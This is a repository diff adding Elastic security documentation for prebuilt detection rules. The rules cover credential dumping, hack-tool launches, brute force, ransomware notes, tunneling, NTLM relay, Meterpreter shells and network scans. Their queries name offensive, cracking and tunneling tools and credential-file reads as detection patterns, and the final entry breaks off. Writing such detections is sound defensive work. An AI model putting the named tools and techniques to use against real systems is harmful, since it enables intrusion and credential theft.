score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/ + +*Tags*: + +* Data Source: Elastic Endgame +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and process.name == "unshadow" and + event.type == "start" and event.action in ("exec", "exec_event") and process.args_count >= 2 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: /etc/passwd and /etc/shadow +** ID: T1003.008 +** Reference URL: https://attack.mitre.org/techniques/T1003/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-hack-tool-launched.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-hack-tool-launched.asciidoc new file mode 100644 index 0000000000..cc5d22356f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-hack-tool-launched.asciidoc @@ -0,0 +1,73 @@ +[[prebuilt-rule-8-10-5-potential-linux-hack-tool-launched]] +=== Potential Linux Hack Tool Launched + +Monitors for the execution of different processes that might be used by attackers for malicious intent. An alert from this rule should be investigated further, as hack tools are commonly used by blue teamers and system administrators as well. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and +process.name in ( + // exploitation frameworks + "crackmapexec", "msfconsole", "msfvenom", "sliver-client", "sliver-server", "havoc", + // network scanners (nmap left out to reduce noise) + "zenmap", "nuclei", "netdiscover", "legion", + // web enumeration + "gobuster", "dirbuster", "dirb", "wfuzz", "ffuf", "whatweb", "eyewitness", + // web vulnerability scanning + "wpscan", "joomscan", "droopescan", "nikto", + // exploitation tools + "sqlmap", "commix", "yersinia", + // cracking and brute forcing + "john", "hashcat", "hydra", "ncrack", "cewl", "fcrackzip", "rainbowcrack", + // host and network + "linenum.sh", "linpeas.sh", "pspy32", "pspy32s", "pspy64", "pspy64s", "binwalk", "evil-winrm" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected.asciidoc new file mode 100644 index 0000000000..34e2e5f1c0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected.asciidoc @@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected]] +=== Potential Linux Local Account Brute Force Detected + +Identifies multiple consecutive login attempts executed by one process targeting a local linux user account within a short time interval. Adversaries might brute force login attempts across different users with a default wordlist or a set of customly crafted passwords in an attempt to gain access to these accounts. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.executable, user.id with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "su" and + not process.parent.name in ( + "bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "clickhouse-server" + )] with runs=10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected.asciidoc new file mode 100644 index 0000000000..33cbef2d8c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected.asciidoc @@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected]] +=== Potential Linux Ransomware Note Creation Detected + +This rule identifies a sequence of a mass file encryption event in conjunction with the creation of a .txt file with a file name containing ransomware keywords executed by the same process in a 1 second timespan. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Impact +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id, host.id with maxspan=1s + [file where host.os.type == "linux" and event.type == "change" and event.action == "rename" and file.extension : "?*" + and process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*") and + file.path : ( + "/home/*/Downloads/*", "/home/*/Documents/*", "/root/*", "/bin/*", "/usr/bin/*", + "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*")] with runs=25 + [file where host.os.type == "linux" and event.action == "creation" and file.name : ( + "*crypt*", "*restore*", "*lock*", "*recovery*", "*data*", "*read*", "*instruction*", "*how_to*", "*ransom*" + )] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding.asciidoc new file mode 100644 index 0000000000..a77a9e00e7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding.asciidoc @@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding]] +=== Potential Linux Tunneling and/or Port Forwarding + +This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform +* https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and (( + // gost & pivotnacci - spawned without process.parent.name + (process.name == "gost" and process.args : ("-L*", "-C*", "-R*")) or (process.name == "pivotnacci")) or ( + // ssh + (process.name in ("ssh", "sshd") and (process.args in ("-R", "-L", "D", "-w") and process.args_count >= 4 and + not process.args : "chmod")) or + // sshuttle + (process.name == "sshuttle" and process.args in ("-r", "--remote", "-l", "--listen") and process.args_count >= 4) or + // socat + (process.name == "socat" and process.args : ("TCP4-LISTEN:*", "SOCKS*") and process.args_count >= 3) or + // chisel + (process.name : "chisel*" and process.args in ("client", "server")) or + // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok + (process.name in ("iodine", "iodined", "dnscat", "hans", "hans-ubuntu", "ptunnel-ng", "ssf", "3proxy", "ngrok")) + ) and process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http.asciidoc new file mode 100644 index 0000000000..071c2a9391 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http.asciidoc @@ -0,0 +1,87 @@ +[[prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http]] +=== Potential Local NTLM Relay via HTTP + +Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/med0x2e/NTLMRelay2Self +* https://github.com/topotam/PetitPotam +* https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : "rundll32.exe" and + + /* Rundll32 WbeDav Client */ + process.args : ("?:\\Windows\\System32\\davclnt.dll,DavSetCookie", "?:\\Windows\\SysWOW64\\davclnt.dll,DavSetCookie") and + + /* Access to named pipe via http */ + process.args : ("http*/print/pipe/*", "http*/pipe/spoolss", "http*/pipe/srvsvc") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Exploitation for Credential Access +** ID: T1212 +** Reference URL: https://attack.mitre.org/techniques/T1212/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps.asciidoc new file mode 100644 index 0000000000..e04e4e1dca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps.asciidoc @@ -0,0 +1,134 @@ +[[prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps]] +=== Potential Masquerading as Communication Apps + +Identifies suspicious instances of communications apps, both unsigned and renamed ones, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and + event.type == "start" and + ( + /* Slack */ + (process.name : "slack.exe" and not + (process.code_signature.subject_name in ( + "Slack Technologies, Inc.", + "Slack Technologies, LLC" + ) and process.code_signature.trusted == true) + ) or + + /* WebEx */ + (process.name : "WebexHost.exe" and not + (process.code_signature.subject_name in ("Cisco WebEx LLC", "Cisco Systems, Inc.") and process.code_signature.trusted == true) + ) or + + /* Teams */ + (process.name : "Teams.exe" and not + (process.code_signature.subject_name == "Microsoft Corporation" and process.code_signature.trusted == true) + ) or + + /* Discord */ + (process.name : "Discord.exe" and not + (process.code_signature.subject_name == "Discord Inc." and process.code_signature.trusted == true) + ) or + + /* RocketChat */ + (process.name : "Rocket.Chat.exe" and not + (process.code_signature.subject_name == "Rocket.Chat Technologies Corp." and process.code_signature.trusted == true) + ) or + + /* Mattermost */ + (process.name : "Mattermost.exe" and not + (process.code_signature.subject_name == "Mattermost, Inc." and process.code_signature.trusted == true) + ) or + + /* WhatsApp */ + (process.name : "WhatsApp.exe" and not + (process.code_signature.subject_name in ( + "WhatsApp LLC", + "WhatsApp, Inc", + "24803D75-212C-471A-BC57-9EF86AB91435" + ) and process.code_signature.trusted == true) + ) or + + /* Zoom */ + (process.name : "Zoom.exe" and not + (process.code_signature.subject_name == "Zoom Video Communications, Inc." and process.code_signature.trusted == true) + ) or + + /* Outlook */ + (process.name : "outlook.exe" and not + (process.code_signature.subject_name == "Microsoft Corporation" and process.code_signature.trusted == true) + ) or + + /* Thunderbird */ + (process.name : "thunderbird.exe" and not + (process.code_signature.subject_name == "Mozilla Corporation" and process.code_signature.trusted == true) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell.asciidoc new file mode 100644 index 0000000000..f94f140298 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell.asciidoc @@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell]] +=== Potential Meterpreter Reverse Shell + +This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-auditd_manager.auditd-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sample by host.id, process.pid, user.id +[file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and auditd.data.syscall == "open" and + auditd.data.a2 == "1b6" and file.path == "/etc/machine-id"] +[file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and auditd.data.syscall == "open" and + auditd.data.a2 == "1b6" and file.path == "/etc/passwd"] +[file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and auditd.data.syscall == "open" and + auditd.data.a2 == "1b6" and file.path == "/proc/net/route"] +[file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and auditd.data.syscall == "open" and + auditd.data.a2 == "1b6" and file.path == "/proc/net/ipv6_route"] +[file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and auditd.data.syscall == "open" and + auditd.data.a2 == "1b6" and file.path == "/proc/net/if_inet6"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-detected.asciidoc new file mode 100644 index 0000000000..b1f99bb4cd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-detected.asciidoc @@ -0,0 +1,74 @@ +[[prebuilt-rule-8-10-5-potential-network-scan-detected]] +=== Potential Network Scan Detected + +This rule identifies a potential port scan. A port scan is a method utilized by attackers to systematically scan a target system or network for open ports, allowing them to identify available services and potential vulnerabilities. By mapping out the open ports, attackers can gather critical information to plan and execute targeted attacks, gaining unauthorized access, compromising security, and potentially leading to data breaches, unauthorized control, or further exploitation of the targeted system or network. This rule proposes threshold logic to check for connection attempts from one source host to 20 or more destination ports. + +*Rule type*: threshold + +*Rule indices*: + +* logs-endpoint.events.network-* +* logs-network_traffic.* +* packetbeat-* +* filebeat-* +* auditbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 5 + +*References*: None + +*Tags*: + +* Domain: Network +* Tactic: Discovery +* Tactic: Reconnaissance +* Use Case: Network Security Monitoring + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +destination.port : * and event.action : "network_flow" and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Scanning IP Blocks +** ID: T1595.001 +** Reference URL: https://attack.mitre.org/techniques/T1595/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-executed-from-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-executed-from-host.asciidoc new file mode 100644 index 0000000000..8b46a691ca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-executed-from-host.asciidoc @@ -0,0 +1,60 @@ +[[prebuilt-rule-8-10-5-potential-network-scan-executed-from-host]] +=== Potential Network Scan Executed From Host + +This threshold rule monitors for the rapid execution of unix utilities that are capable of conducting network scans. Adversaries may leverage built-in tools such as ping, netcat or socat to execute ping sweeps across the network while attempting to evade detection or due to the lack of network mapping tools available on the compromised host. + +*Rule type*: threshold + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.action:exec and event.type:start and +process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat or socat) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-sweep-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-sweep-detected.asciidoc new file mode 100644 index 0000000000..ba9ca703e6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-sweep-detected.asciidoc @@ -0,0 +1,75 @@ +[[prebuilt-rule-8-10-5-potential-network-sweep-detected]] +=== Potential Network Sweep Detected + +This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination hosts on commonly used network services. + +*Rule type*: threshold + +*Rule indices*: + +* packetbeat-* +* auditbeat-* +* filebeat-* +* logs-network_traffic.* +* logs-endpoint.events.network-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 5 + +*References*: None + +*Tags*: + +* Domain: Network +* Tactic: Discovery +* Tactic: Reconnaissance +* Use Case: Network Security Monitoring + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +destination.port : (21 or 22 or 23 or 25 or 139 or 445 or 3389 or 5985 or 5986) and +source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Scanning IP Blocks +** ID: T1595.001 +** Reference URL: https://attack.mitre.org/techniques/T1595/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection.asciidoc new file mode 100644 index 0000000000..a6991658ba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection.asciidoc @@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection]] +=== Potential Non-Standard Port SSH connection + +Identifies potentially malicious processes communicating via a port paring typically not associated with SSH. For example, SSH over port 2200 or port 2222 as opposed to the traditional port 22. Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1571/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* OS: macOS +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=1m + [process where event.action == "exec" and process.name:"ssh" and not process.parent.name in ( + "rsync", "pyznap", "git", "ansible-playbook", "scp", "pgbackrest", "git-lfs", "expect", "Sourcetree", "ssh-copy-id", + "run" + ) + ] + [network where process.name:"ssh" and event.action in ("connection_attempted", "connection_accepted") and + destination.port != 22 and destination.ip != "127.0.0.1" and network.transport: "tcp" + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Non-Standard Port +** ID: T1571 +** Reference URL: https://attack.mitre.org/techniques/T1571/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity.asciidoc new file mode 100644 index 0000000000..4b552aa0dd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity.asciidoc @@ -0,0 +1,103 @@ +[[prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity]] +=== Potential OpenSSH Backdoor Logging Activity + +Identifies a Secure Shell (SSH) client or server process creating or writing to a known SSH backdoor log file. Adversaries may modify SSH related binaries for persistence or credential access via patching sensitive functions to enable unauthorized access or to log SSH credentials for exfiltration. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* 